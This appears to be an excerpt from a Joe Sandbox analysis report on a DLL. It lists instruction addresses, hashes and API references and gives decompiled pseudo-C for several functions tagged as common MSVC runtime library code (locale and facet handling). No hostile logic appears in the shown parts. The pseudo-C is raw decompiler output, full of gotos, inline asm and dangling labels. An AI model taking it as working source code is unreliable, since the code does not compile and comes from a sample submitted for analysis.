                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F0E4
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F0EE
                          • int.LIBCPMT ref: 6E20F105
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • ctype.LIBCPMT ref: 6E20F128
                          • std::_Facet_Register.LIBCPMT ref: 6E20F13F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F15F
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F17D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
                          • String ID: (k,n
                          • API String ID: 1394824916-2474335229
                          • Opcode ID: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
                          • Instruction ID: 0c45d773f348144a53aee096c385ca3720259a60b4694af22e905baab13ee6b9
                          • Opcode Fuzzy Hash: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
                          • Instruction Fuzzy Hash: 7011C67591052DDBCF01EBE4C894AEEB7BBAF45B15F240908E510AB3D0DB749A44C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E24E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6e2c506c; // 0x22cbda9b
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6E24D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6E24DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6E24F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6E2491A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6E242188();
									asm("int3");
									_t171 =  *0x6e2c76f0; // 0x10d6aa8
									 *0x6e2c5108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6e2c51c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6e2c51ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6E24DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6E256102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6e270ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6E221C3C( &_v528,  *0x6e2c51e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6e270de8; // 0x6e20815c
									 *0x6e26a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6e2c52b0;
										if(_t233 != 0x6e2c52b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6E24CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6E24CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6E24CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6E24CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6E24CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6E21F8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

























































                          0x6e24e987
                          0x6e24e98f
                          0x6e24e996
                          0x6e24e999
                          0x6e24e99a
                          0x6e24e99d
                          0x6e24e9a1
                          0x6e24e9a2
                          0x6e24e9a5
                          0x6e24e9b5
                          0x6e24e9d8
                          0x6e24e9dd
                          0x6e24e9e2
                          0x6e24e9f7
                          0x6e24e9fa
                          0x6e24e9fa
                          0x6e24e9fd
                          0x6e24ea03
                          0x6e24ea09
                          0x6e24ea0c
                          0x6e24ea0e
                          0x6e24ea11
                          0x6e24ea18
                          0x6e24ea1b
                          0x6e24ea21
                          0x00000000
                          0x00000000
                          0x6e24ea23
                          0x6e24ea27
                          0x6e24ea50
                          0x6e24ea50
                          0x6e24ea29
                          0x6e24ea29
                          0x6e24ea2d
                          0x6e24ea31
                          0x6e24ea38
                          0x6e24ea3e
                          0x00000000
                          0x6e24ea40
                          0x6e24ea40
                          0x6e24ea43
                          0x6e24ea46
                          0x6e24ea4e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24ea4e
                          0x6e24ea3e
                          0x6e24ea5d
                          0x6e24ea5d
                          0x6e24ea5f
                          0x6e24ea65
                          0x6e24ea6b
                          0x6e24ea6e
                          0x6e24ea6e
                          0x6e24ea71
                          0x6e24ea74
                          0x6e24ea74
                          0x6e24ea84
                          0x6e24ea92
                          0x6e24ea97
                          0x6e24ea9e
                          0x6e24eaa0
                          0x00000000
                          0x6e24eaa6
                          0x6e24eaac
                          0x6e24eab2
                          0x6e24eab9
                          0x6e24eabf
                          0x6e24eac2
                          0x6e24eac8
                          0x6e24ead5
                          0x6e24eadc
                          0x6e24eae1
                          0x6e24eae4
                          0x6e24eae6
                          0x6e24ed3f
                          0x6e24ed45
                          0x6e24ed46
                          0x6e24ed47
                          0x6e24ed48
                          0x6e24ed49
                          0x6e24ed4a
                          0x6e24ed4f
                          0x6e24ed50
                          0x6e24ed5b
                          0x6e24ed63
                          0x6e24ed69
                          0x6e24ed6c
                          0x6e24ed71
                          0x6e24eaec
                          0x6e24eaec
                          0x6e24eafa
                          0x6e24eafd
                          0x6e24eb18
                          0x6e24eb1f
                          0x6e24eb25
                          0x6e24eb2b
                          0x6e24eaff
                          0x6e24eaff
                          0x6e24eb07
                          0x00000000
                          0x6e24eb09
                          0x6e24eb09
                          0x6e24eb0f
                          0x6e24eb0f
                          0x6e24eb07
                          0x6e24eb32
                          0x6e24eb35
                          0x6e24ec52
                          0x6e24ec55
                          0x6e24ec62
                          0x6e24ec65
                          0x6e24ec6d
                          0x6e24ec6d
                          0x6e24ec57
                          0x6e24ec5d
                          0x6e24ec5d
                          0x6e24eb3b
                          0x6e24eb3b
                          0x6e24eb41
                          0x6e24eb49
                          0x6e24eb4b
                          0x6e24eb4e
                          0x6e24eb57
                          0x6e24eb60
                          0x6e24eb66
                          0x6e24eb66
                          0x6e24eb69
                          0x6e24eb6b
                          0x00000000
                          0x00000000
                          0x6e24eb6d
                          0x6e24eb73
                          0x6e24eb74
                          0x6e24eb7f
                          0x6e24eb87
                          0x6e24eb8f
                          0x6e24eb92
                          0x6e24eb95
                          0x6e24eb9b
                          0x6e24eba1
                          0x6e24eba7
                          0x6e24ebad
                          0x6e24ebb0
                          0x00000000
                          0x00000000
                          0x6e24ebb2
                          0x6e24ebd7
                          0x6e24ebd7
                          0x6e24ebda
                          0x6e24ebde
                          0x6e24ebf7
                          0x6e24ebfc
                          0x6e24ebff
                          0x6e24ec01
                          0x6e24ec07
                          0x6e24ec42
                          0x6e24ec09
                          0x6e24ec09
                          0x6e24ec0e
                          0x6e24ec16
                          0x6e24ec17
                          0x6e24ec17
                          0x6e24ec2e
                          0x6e24ec35
                          0x6e24ec38
                          0x6e24ec3d
                          0x6e24ec3d
                          0x6e24ec45
                          0x6e24ec48
                          0x6e24ec48
                          0x6e24ec4d
                          0x00000000
                          0x6e24ec4d
                          0x6e24ebb4
                          0x6e24ebb6
                          0x6e24ebbb
                          0x6e24ebc1
                          0x6e24ebca
                          0x6e24ebd3
                          0x6e24ebd3
                          0x00000000
                          0x6e24ebb6
                          0x6e24ec70
                          0x6e24ec70
                          0x6e24ec74
                          0x6e24ec7c
                          0x6e24ec82
                          0x6e24ec85
                          0x6e24ec8b
                          0x6e24ec8d
                          0x6e24eccd
                          0x6e24ecd3
                          0x6e24ecda
                          0x6e24ecda
                          0x6e24ece0
                          0x6e24ece4
                          0x00000000
                          0x6e24ece6
                          0x6e24ece6
                          0x6e24ecea
                          0x6e24ecef
                          0x6e24ecf3
                          0x6e24ecf8
                          0x6e24ecff
                          0x6e24ed0d
                          0x6e24ed13
                          0x6e24ed16
                          0x6e24ed16
                          0x6e24ece4
                          0x6e24ed25
                          0x6e24ed2d
                          0x6e24ed36
                          0x6e24ec8f
                          0x6e24ec95
                          0x6e24ec98
                          0x6e24ec9f
                          0x6e24ecb1
                          0x6e24ecb8
                          0x6e24ecc5
                          0x00000000
                          0x6e24ecc5
                          0x00000000
                          0x6e24ec8d
                          0x6e24eae6
                          0x6e24ea61
                          0x00000000
                          0x6e24ea61
                          0x00000000
                          0x6e24ea5f
                          0x6e24ea58
                          0x6e24ea5a
                          0x6e24ea5a
                          0x00000000
                          0x6e24e9e4
                          0x6e24e9e4
                          0x6e24e9e6
                          0x6e24e9ea
                          0x6e24e9f6
                          0x6e24e9f6
                          0x00000000

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • _memcmp.LIBVCRUNTIME ref: 6E24EC2E
                          • _free.LIBCMT ref: 6E24EC9F
                          • _free.LIBCMT ref: 6E24ECB8
                          • _free.LIBCMT ref: 6E24ECEA
                          • _free.LIBCMT ref: 6E24ECF3
                          • _free.LIBCMT ref: 6E24ECFF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorLast$_abort_memcmp
                          • String ID: C
                          • API String ID: 1679612858-1037565863
                          • Opcode ID: 6a6fa75c753b15ece908a815969655c54366d2d8d26146940af82ee3fc049b99
                          • Instruction ID: b1b15a0b1200166e04248ea529bcf5a4c7a177af09dd3a0eb513ee286b4b1cfc
                          • Opcode Fuzzy Hash: 6a6fa75c753b15ece908a815969655c54366d2d8d26146940af82ee3fc049b99
                          • Instruction Fuzzy Hash: 56C15D7590121EDFEB68DF58C888A9DB7B6FF49704F1045AAD94AAB350D731AE80CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E20FC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t66 - 0x14, 0);
				_t63 =  *0x6e2c6dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1E161C(0x6e2c6d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1E171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E2066BA(_t66 - 0x14);
					return E6E220075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E21162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1E1438(_t55);
							E6E223D74(_t66 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e26c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E21542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E220075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E206FD3(__eflags, _t61);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e2c6dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}









                          0x6e20fc89
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcba
                          0x6e20fcbf
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FC90
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FC9A
                          • int.LIBCPMT ref: 6E20FCB1
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FCEB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FD0B
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FD29
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: `m,n
                          • API String ID: 651022567-3377878941
                          • Opcode ID: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
                          • Instruction ID: 70e9a397f8daf559b16a6cef501db3e2e9ae6d66d710fdfc6a7615a233d05766
                          • Opcode Fuzzy Hash: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
                          • Instruction Fuzzy Hash: CE11067590052DCBCF00EBE0CC94AEEB77BBF45714F240908E4106B2D0DBB49A44C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E6E21BB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t110 - 0x14, 0);
				_t105 =  *0x6e2c6e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1E161C(0x6e2c6e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E2066BA(_t110 - 0x14);
					return E6E220075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E21C229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t110 - 0x20);
							E6E223D74(_t110 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t102, _t105, 0x14);
							E6E206653(_t110 - 0x14, 0);
							_t106 =  *0x6e2c6e44; // 0x0
